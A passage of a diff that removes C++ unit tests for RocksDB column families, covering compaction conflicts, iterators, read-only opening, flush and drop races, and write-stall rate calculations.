-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::BackgroundCompaction()::Conflict",
-        "ColumnFamilyTest::ManualAutoCon:7"},
-       {"ColumnFamilyTest::ManualAutoCon:9",
-        "ColumnFamilyTest::ManualAutoCon:8"},
-       {"ColumnFamilyTest::ManualAutoCon:2",
-        "ColumnFamilyTest::ManualAutoCon:6"},
-       {"ColumnFamilyTest::ManualAutoCon:4",
-        "ColumnFamilyTest::ManualAutoCon:5"},
-       {"ColumnFamilyTest::ManualAutoCon:1",
-        "ColumnFamilyTest::ManualAutoCon:2"},
-       {"ColumnFamilyTest::ManualAutoCon:1",
-        "ColumnFamilyTest::ManualAutoCon:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:3");
-        } else if (cf_1_2) {
-          cf_1_2 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:2");
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::RunManualCompaction:NotScheduled", [&](void* arg) {
-        InstrumentedMutex* mutex = static_cast<InstrumentedMutex*>(arg);
-        mutex->Unlock();
-        TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:9");
-        TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:7");
-        mutex->Lock();
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread threads([&] {
-    CompactRangeOptions compact_options;
-    compact_options.exclusive_manual_compaction = false;
-    ASSERT_OK(
-        db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-    TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:6");
-  });
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:8");
-  WaitForFlush(1);
-
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(one.level0_file_num_compaction_trigger + i),
-                        1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:5");
-  // Add more L0 files and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-  }
-  TEST_SYNC_POINT("ColumnFamilyTest::ManualAutoCon:1");
-
-  threads.join();
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  ASSERT_LE(NumTableFilesAtLevel(0, 1), 3);
-
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-
-// In this test, we generate enough files to trigger automatic compactions.
-// The automatic compaction waits in NonTrivial:AfterRun
-// We generate more files and then trigger an automatic compaction
-// This will wait because the automatic compaction has files it needs.
-// Once the conflict is hit, the automatic compaction starts and ends
-// Then the manual will run and end.
-TEST_F(ColumnFamilyTest, SameCFAutomaticManualCompactions) {
-  Open();
-  CreateColumnFamilies({"one"});
-  ColumnFamilyOptions default_cf, one;
-  db_options_.max_open_files = 20;  // only 10 files in file cache
-  db_options_.max_background_compactions = 3;
-
-  default_cf.compaction_style = kCompactionStyleLevel;
-  default_cf.num_levels = 3;
-  default_cf.write_buffer_size = 64 << 10;  // 64KB
-  default_cf.target_file_size_base = 30 << 10;
-  default_cf.max_compaction_bytes = default_cf.target_file_size_base * 1100;
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-  default_cf.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  one.compaction_style = kCompactionStyleUniversal;
-
-  one.num_levels = 1;
-  // trigger compaction if there are >= 4 files
-  one.level0_file_num_compaction_trigger = 4;
-  one.write_buffer_size = 120000;
-
-  Reopen({default_cf, one});
-  // make sure all background compaction jobs can be scheduled
-  auto stop_token =
-      dbfull()->TEST_write_controler().GetCompactionPressureToken();
-
-  bool cf_1_1 = true;
-  bool cf_1_2 = true;
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"ColumnFamilyTest::AutoManual:4", "ColumnFamilyTest::AutoManual:2"},
-       {"ColumnFamilyTest::AutoManual:4", "ColumnFamilyTest::AutoManual:5"},
-       {"CompactionPicker::CompactRange:Conflict",
-        "ColumnFamilyTest::AutoManual:3"}});
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial:AfterRun", [&](void* arg) {
-        if (cf_1_1) {
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:4");
-          cf_1_1 = false;
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:3");
-        } else if (cf_1_2) {
-          TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:2");
-          cf_1_2 = false;
-        }
-      });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // SETUP column family "one" -- universal style
-  for (int i = 0; i < one.level0_file_num_compaction_trigger; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-    AssertFilesPerLevel(ToString(i + 1), 1);
-  }
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:5");
-
-  // Add another L0 file and force automatic compaction
-  for (int i = 0; i < one.level0_file_num_compaction_trigger - 2; ++i) {
-    PutRandomData(1, 10, 12000, true);
-    PutRandomData(1, 1, 10, true);
-    WaitForFlush(1);
-  }
-
-  CompactRangeOptions compact_options;
-  compact_options.exclusive_manual_compaction = false;
-  ASSERT_OK(db_->CompactRange(compact_options, handles_[1], nullptr, nullptr));
-
-  TEST_SYNC_POINT("ColumnFamilyTest::AutoManual:1");
-
-  WaitForCompaction();
-  // VERIFY compaction "one"
-  AssertFilesPerLevel("1", 1);
-  // Compare against saved keys
-  std::set<std::string>::iterator key_iter = keys_.begin();
-  while (key_iter != keys_.end()) {
-    ASSERT_NE("NOT_FOUND", Get(1, *key_iter));
-    key_iter++;
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // Tailing interator not supported
-namespace {
-std::string IterStatus(Iterator* iter) {
-  std::string result;
-  if (iter->Valid()) {
-    result = iter->key().ToString() + "->" + iter->value().ToString();
-  } else {
-    result = "(invalid)";
-  }
-  return result;
-}
-}  // anonymous namespace
-
-TEST_F(ColumnFamilyTest, NewIteratorsTest) {
-  // iter == 0 -- no tailing
-  // iter == 2 -- tailing
-  for (int iter = 0; iter < 2; ++iter) {
-    Open();
-    CreateColumnFamiliesAndReopen({"one", "two"});
-    ASSERT_OK(Put(0, "a", "b"));
-    ASSERT_OK(Put(1, "b", "a"));
-    ASSERT_OK(Put(2, "c", "m"));
-    ASSERT_OK(Put(2, "v", "t"));
-    std::vector<Iterator*> iterators;
-    ReadOptions options;
-    options.tailing = (iter == 1);
-    ASSERT_OK(db_->NewIterators(options, handles_, &iterators));
-
-    for (auto it : iterators) {
-      it->SeekToFirst();
-    }
-    ASSERT_EQ(IterStatus(iterators[0]), "a->b");
-    ASSERT_EQ(IterStatus(iterators[1]), "b->a");
-    ASSERT_EQ(IterStatus(iterators[2]), "c->m");
-
-    ASSERT_OK(Put(1, "x", "x"));
-
-    for (auto it : iterators) {
-      it->Next();
-    }
-
-    ASSERT_EQ(IterStatus(iterators[0]), "(invalid)");
-    if (iter == 0) {
-      // no tailing
-      ASSERT_EQ(IterStatus(iterators[1]), "(invalid)");
-    } else {
-      // tailing
-      ASSERT_EQ(IterStatus(iterators[1]), "x->x");
-    }
-    ASSERT_EQ(IterStatus(iterators[2]), "v->t");
-
-    for (auto it : iterators) {
-      delete it;
-    }
-    Destroy();
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  // ReadOnlyDB is not supported
-TEST_F(ColumnFamilyTest, ReadOnlyDBTest) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two", "three", "four"});
-  ASSERT_OK(Put(0, "a", "b"));
-  ASSERT_OK(Put(1, "foo", "bla"));
-  ASSERT_OK(Put(2, "foo", "blabla"));
-  ASSERT_OK(Put(3, "foo", "blablabla"));
-  ASSERT_OK(Put(4, "foo", "blablablabla"));
-
-  DropColumnFamilies({2});
-  Close();
-  // open only a subset of column families
-  AssertOpenReadOnly({"default", "one", "four"});
-  ASSERT_EQ("NOT_FOUND", Get(0, "foo"));
-  ASSERT_EQ("bla", Get(1, "foo"));
-  ASSERT_EQ("blablablabla", Get(2, "foo"));
-
-
-  // test newiterators
-  {
-    std::vector<Iterator*> iterators;
-    ASSERT_OK(db_->NewIterators(ReadOptions(), handles_, &iterators));
-    for (auto it : iterators) {
-      it->SeekToFirst();
-    }
-    ASSERT_EQ(IterStatus(iterators[0]), "a->b");
-    ASSERT_EQ(IterStatus(iterators[1]), "foo->bla");
-    ASSERT_EQ(IterStatus(iterators[2]), "foo->blablablabla");
-    for (auto it : iterators) {
-      it->Next();
-    }
-    ASSERT_EQ(IterStatus(iterators[0]), "(invalid)");
-    ASSERT_EQ(IterStatus(iterators[1]), "(invalid)");
-    ASSERT_EQ(IterStatus(iterators[2]), "(invalid)");
-
-    for (auto it : iterators) {
-      delete it;
-    }
-  }
-
-  Close();
-  // can't open dropped column family
-  Status s = OpenReadOnly({"default", "one", "two"});
-  ASSERT_TRUE(!s.ok());
-
-  // Can't open without specifying default column family
-  s = OpenReadOnly({"one", "four"});
-  ASSERT_TRUE(!s.ok());
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  //  WaitForFlush() is not supported in lite
-TEST_F(ColumnFamilyTest, DontRollEmptyLogs) {
-  Open();
-  CreateColumnFamiliesAndReopen({"one", "two", "three", "four"});
-
-  for (size_t i = 0; i < handles_.size(); ++i) {
-    PutRandomData(static_cast<int>(i), 10, 100);
-  }
-  int num_writable_file_start = env_->GetNumberOfNewWritableFileCalls();
-  // this will trigger the flushes
-  for (int i = 0; i <= 4; ++i) {
-    ASSERT_OK(Flush(i));
-  }
-
-  for (int i = 0; i < 4; ++i) {
-    WaitForFlush(i);
-  }
-  int total_new_writable_files =
-      env_->GetNumberOfNewWritableFileCalls() - num_writable_file_start;
-  ASSERT_EQ(static_cast<size_t>(total_new_writable_files), handles_.size() + 1);
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-#ifndef ROCKSDB_LITE  //  WaitForCompaction() is not supported in lite
-TEST_F(ColumnFamilyTest, FlushStaleColumnFamilies) {
-  Open();
-  CreateColumnFamilies({"one", "two"});
-  ColumnFamilyOptions default_cf, one, two;
-  default_cf.write_buffer_size = 100000;  // small write buffer size
-  default_cf.arena_block_size = 4096;
-  default_cf.disable_auto_compactions = true;
-  one.disable_auto_compactions = true;
-  two.disable_auto_compactions = true;
-  db_options_.max_total_wal_size = 210000;
-
-  Reopen({default_cf, one, two});
-
-  PutRandomData(2, 1, 10);  // 10 bytes
-  for (int i = 0; i < 2; ++i) {
-    PutRandomData(0, 100, 1000);  // flush
-    WaitForFlush(0);
-
-    AssertCountLiveFiles(i + 1);
-  }
-  // third flush. now, CF [two] should be detected as stale and flushed
-  // column family 1 should not be flushed since it's empty
-  PutRandomData(0, 100, 1000);  // flush
-  WaitForFlush(0);
-  WaitForFlush(2);
-  // 3 files for default column families, 1 file for column family [two], zero
-  // files for column family [one], because it's empty
-  AssertCountLiveFiles(4);
-
-  Flush(0);
-  ASSERT_EQ(0, dbfull()->TEST_total_log_size());
-  Close();
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(ColumnFamilyTest, CreateMissingColumnFamilies) {
-  Status s = TryOpen({"one", "two"});
-  ASSERT_TRUE(!s.ok());
-  db_options_.create_missing_column_families = true;
-  s = TryOpen({"default", "one", "two"});
-  ASSERT_TRUE(s.ok());
-  Close();
-}
-
-TEST_F(ColumnFamilyTest, SanitizeOptions) {
-  DBOptions db_options;
-  for (int s = kCompactionStyleLevel; s <= kCompactionStyleUniversal; ++s) {
-    for (int l = 0; l <= 2; l++) {
-      for (int i = 1; i <= 3; i++) {
-        for (int j = 1; j <= 3; j++) {
-          for (int k = 1; k <= 3; k++) {
-            ColumnFamilyOptions original;
-            original.compaction_style = static_cast<CompactionStyle>(s);
-            original.num_levels = l;
-            original.level0_stop_writes_trigger = i;
-            original.level0_slowdown_writes_trigger = j;
-            original.level0_file_num_compaction_trigger = k;
-            original.write_buffer_size =
-                l * 4 * 1024 * 1024 + i * 1024 * 1024 + j * 1024 + k;
-
-            ColumnFamilyOptions result =
-                SanitizeOptions(ImmutableDBOptions(db_options), original);
-            ASSERT_TRUE(result.level0_stop_writes_trigger >=
-                        result.level0_slowdown_writes_trigger);
-            ASSERT_TRUE(result.level0_slowdown_writes_trigger >=
-                        result.level0_file_num_compaction_trigger);
-            ASSERT_TRUE(result.level0_file_num_compaction_trigger ==
-                        original.level0_file_num_compaction_trigger);
-            if (s == kCompactionStyleLevel) {
-              ASSERT_GE(result.num_levels, 2);
-            } else {
-              ASSERT_GE(result.num_levels, 1);
-              if (original.num_levels >= 1) {
-                ASSERT_EQ(result.num_levels, original.num_levels);
-              }
-            }
-
-            // Make sure Sanitize options sets arena_block_size to 1/8 of
-            // the write_buffer_size, rounded up to a multiple of 4k.
-            size_t expected_arena_block_size =
-                l * 4 * 1024 * 1024 / 8 + i * 1024 * 1024 / 8;
-            if (j + k != 0) {
-              // not a multiple of 4k, round up 4k
-              expected_arena_block_size += 4 * 1024;
-            }
-            ASSERT_EQ(expected_arena_block_size, result.arena_block_size);
-          }
-        }
-      }
-    }
-  }
-}
-
-TEST_F(ColumnFamilyTest, ReadDroppedColumnFamily) {
-  // iter 0 -- drop CF, don't reopen
-  // iter 1 -- delete CF, reopen
-  for (int iter = 0; iter < 2; ++iter) {
-    db_options_.create_missing_column_families = true;
-    db_options_.max_open_files = 20;
-    // delete obsolete files always
-    db_options_.delete_obsolete_files_period_micros = 0;
-    Open({"default", "one", "two"});
-    ColumnFamilyOptions options;
-    options.level0_file_num_compaction_trigger = 100;
-    options.level0_slowdown_writes_trigger = 200;
-    options.level0_stop_writes_trigger = 200;
-    options.write_buffer_size = 100000;  // small write buffer size
-    Reopen({options, options, options});
-
-    // 1MB should create ~10 files for each CF
-    int kKeysNum = 10000;
-    PutRandomData(0, kKeysNum, 100);
-    PutRandomData(1, kKeysNum, 100);
-    PutRandomData(2, kKeysNum, 100);
-
-    {
-      std::unique_ptr<Iterator> iterator(
-          db_->NewIterator(ReadOptions(), handles_[2]));
-      iterator->SeekToFirst();
-
-      if (iter == 0) {
-        // Drop CF two
-        ASSERT_OK(db_->DropColumnFamily(handles_[2]));
-      } else {
-        // delete CF two
-        db_->DestroyColumnFamilyHandle(handles_[2]);
-        handles_[2] = nullptr;
-      }
-      // Make sure iterator created can still be used.
-      int count = 0;
-      for (; iterator->Valid(); iterator->Next()) {
-        ASSERT_OK(iterator->status());
-        ++count;
-      }
-      ASSERT_OK(iterator->status());
-      ASSERT_EQ(count, kKeysNum);
-    }
-
-    // Add bunch more data to other CFs
-    PutRandomData(0, kKeysNum, 100);
-    PutRandomData(1, kKeysNum, 100);
-
-    if (iter == 1) {
-      Reopen();
-    }
-
-    // Since we didn't delete CF handle, RocksDB's contract guarantees that
-    // we're still able to read dropped CF
-    for (int i = 0; i < 3; ++i) {
-      std::unique_ptr<Iterator> iterator(
-          db_->NewIterator(ReadOptions(), handles_[i]));
-      int count = 0;
-      for (iterator->SeekToFirst(); iterator->Valid(); iterator->Next()) {
-        ASSERT_OK(iterator->status());
-        ++count;
-      }
-      ASSERT_OK(iterator->status());
-      ASSERT_EQ(count, kKeysNum * ((i == 2) ? 1 : 2));
-    }
-
-    Close();
-    Destroy();
-  }
-}
-
-TEST_F(ColumnFamilyTest, FlushAndDropRaceCondition) {
-  db_options_.create_missing_column_families = true;
-  Open({"default", "one"});
-  ColumnFamilyOptions options;
-  options.level0_file_num_compaction_trigger = 100;
-  options.level0_slowdown_writes_trigger = 200;
-  options.level0_stop_writes_trigger = 200;
-  options.max_write_buffer_number = 20;
-  options.write_buffer_size = 100000;  // small write buffer size
-  Reopen({options, options});
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"VersionSet::LogAndApply::ColumnFamilyDrop:0",
-        "FlushJob::WriteLevel0Table"},
-       {"VersionSet::LogAndApply::ColumnFamilyDrop:1",
-        "FlushJob::InstallResults"},
-       {"FlushJob::InstallResults",
-        "VersionSet::LogAndApply::ColumnFamilyDrop:2"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  test::SleepingBackgroundTask sleeping_task;
-
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-
-  // 1MB should create ~10 files for each CF
-  int kKeysNum = 10000;
-  PutRandomData(1, kKeysNum, 100);
-
-  std::vector<port::Thread> threads;
-  threads.emplace_back([&] { ASSERT_OK(db_->DropColumnFamily(handles_[1])); });
-
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-  sleeping_task.Reset();
-  // now we sleep again. this is just so we're certain that flush job finished
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task,
-                 Env::Priority::HIGH);
-  sleeping_task.WakeUp();
-  sleeping_task.WaitUntilDone();
-
-  {
-    // Since we didn't delete CF handle, RocksDB's contract guarantees that
-    // we're still able to read dropped CF
-    std::unique_ptr<Iterator> iterator(
-        db_->NewIterator(ReadOptions(), handles_[1]));
-    int count = 0;
-    for (iterator->SeekToFirst(); iterator->Valid(); iterator->Next()) {
-      ASSERT_OK(iterator->status());
-      ++count;
-    }
-    ASSERT_OK(iterator->status());
-    ASSERT_EQ(count, kKeysNum);
-  }
-  for (auto& t : threads) {
-    t.join();
-  }
-
-  Close();
-  Destroy();
-}
-
-#ifndef ROCKSDB_LITE
-// skipped as persisting options is not supported in ROCKSDB_LITE
-namespace {
-std::atomic<int> test_stage(0);
-const int kMainThreadStartPersistingOptionsFile = 1;
-const int kChildThreadFinishDroppingColumnFamily = 2;
-const int kChildThreadWaitingMainThreadPersistOptions = 3;
-void DropSingleColumnFamily(ColumnFamilyTest* cf_test, int cf_id,
-                            std::vector<Comparator*>* comparators) {
-  while (test_stage < kMainThreadStartPersistingOptionsFile) {
-    Env::Default()->SleepForMicroseconds(100);
-  }
-  cf_test->DropColumnFamilies({cf_id});
-  if ((*comparators)[cf_id]) {
-    delete (*comparators)[cf_id];
-    (*comparators)[cf_id] = nullptr;
-  }
-  test_stage = kChildThreadFinishDroppingColumnFamily;
-}
-}  // namespace
-
-TEST_F(ColumnFamilyTest, CreateAndDropRace) {
-  const int kCfCount = 5;
-  std::vector<ColumnFamilyOptions> cf_opts;
-  std::vector<Comparator*> comparators;
-  for (int i = 0; i < kCfCount; ++i) {
-    cf_opts.emplace_back();
-    comparators.push_back(new test::SimpleSuffixReverseComparator());
-    cf_opts.back().comparator = comparators.back();
-  }
-  db_options_.create_if_missing = true;
-  db_options_.create_missing_column_families = true;
-
-  auto main_thread_id = std::this_thread::get_id();
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack("PersistRocksDBOptions:start",
-                                                 [&](void* arg) {
-    auto current_thread_id = std::this_thread::get_id();
-    // If it's the main thread hitting this sync-point, then it
-    // will be blocked until some other thread update the test_stage.
-    if (main_thread_id == current_thread_id) {
-      test_stage = kMainThreadStartPersistingOptionsFile;
-      while (test_stage < kChildThreadFinishDroppingColumnFamily) {
-        Env::Default()->SleepForMicroseconds(100);
-      }
-    }
-  });
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "WriteThread::EnterUnbatched:Wait", [&](void* arg) {
-        // This means a thread doing DropColumnFamily() is waiting for
-        // other thread to finish persisting options.
-        // In such case, we update the test_stage to unblock the main thread.
-        test_stage = kChildThreadWaitingMainThreadPersistOptions;
-
-        // Note that based on the test setting, this must not be the
-        // main thread.
-        ASSERT_NE(main_thread_id, std::this_thread::get_id());
-      });
-
-  // Create a database with four column families
-  Open({"default", "one", "two", "three"},
-       {cf_opts[0], cf_opts[1], cf_opts[2], cf_opts[3]});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Start a thread that will drop the first column family
-  // and its comparator
-  rocksdb::port::Thread drop_cf_thread(DropSingleColumnFamily, this, 1, &comparators);
-
-  DropColumnFamilies({2});
-
-  drop_cf_thread.join();
-  Close();
-  Destroy();
-  for (auto* comparator : comparators) {
-    if (comparator) {
-      delete comparator;
-    }
-  }
-}
-#endif  // !ROCKSDB_LITE
-
-TEST_F(ColumnFamilyTest, WriteStallSingleColumnFamily) {
-  const uint64_t kBaseRate = 800000u;
-  db_options_.delayed_write_rate = kBaseRate;
-  db_options_.max_background_compactions = 6;
-
-  Open({"default"});
-  ColumnFamilyData* cfd =
-      static_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())->cfd();
-
-  VersionStorageInfo* vstorage = cfd->current()->storage_info();
-
-  MutableCFOptions mutable_cf_options(column_family_options_);
-
-  mutable_cf_options.level0_slowdown_writes_trigger = 20;
-  mutable_cf_options.level0_stop_writes_trigger = 10000;
-  mutable_cf_options.soft_pending_compaction_bytes_limit = 200;
-  mutable_cf_options.hard_pending_compaction_bytes_limit = 2000;
-  mutable_cf_options.disable_auto_compactions = false;
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(50);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(201);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(400);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(500);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(450);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(205);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(202);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(201);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(198);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(399);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(599);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(2001);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(3001);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(390);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(100);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  vstorage->set_l0_delay_trigger_count(100);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate, GetDbDelayedWriteRate());
-  ASSERT_EQ(6, dbfull()->TEST_BGCompactionsAllowed());
-
-  vstorage->set_l0_delay_trigger_count(101);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(0);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(300);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(101);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->TEST_set_estimated_compaction_needed_bytes(200);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-  ASSERT_EQ(kBaseRate / 1.25 / 1.25, GetDbDelayedWriteRate());
-
-  vstorage->set_l0_delay_trigger_count(0);
-  vstorage->TEST_set_estimated_compaction_needed_bytes(0);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
-  mutable_cf_options.disable_auto_compactions = true;
-  dbfull()->TEST_write_controler().set_delayed_write_rate(kBaseRate);
-  cfd->RecalculateWriteStallConditions(mutable_cf_options);
-  ASSERT_TRUE(!IsDbWriteStopped());
-  ASSERT_TRUE(!dbfull()->TEST_write_controler().NeedsDelay());
-
